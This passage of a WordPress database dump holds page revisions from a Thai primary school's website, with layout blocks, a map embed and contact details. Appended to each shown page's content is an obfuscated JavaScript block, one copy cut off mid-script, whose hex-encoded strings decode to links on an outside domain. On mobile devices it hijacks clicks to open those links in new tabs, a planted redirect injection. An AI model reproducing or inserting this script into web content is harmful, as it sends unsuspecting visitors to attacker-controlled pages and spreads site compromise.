{\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingColor\":\"#130b0b\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"y6fpy3h2\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"viewBgColor\":\"#27ccc105\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนบ้านหนองปลาเข็ง-กอไหล่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">ตำบล โพธิ์ อำเภอ โนนคูณ ศรีสะเกษ 33250</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ :  093-325-2659 ผู้อำนวยการโรงเรียน</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2FbannongpakhaengSchool%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-08-07 13:56:03','2024-08-07 06:56:03','',14,'http://pakhaeng.ssk.in.th/?p=642',0,'revision','',0),
(643,1,'2024-08-07 14:09:01','2024-08-07 07:09:01','<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {\"id\":645,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ประวัติโรงเรียนโดยย่อ_page-0001.jpg\" alt=\"\" class=\"wp-image-645\"/></figure>\n<!-- /wp:image -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v 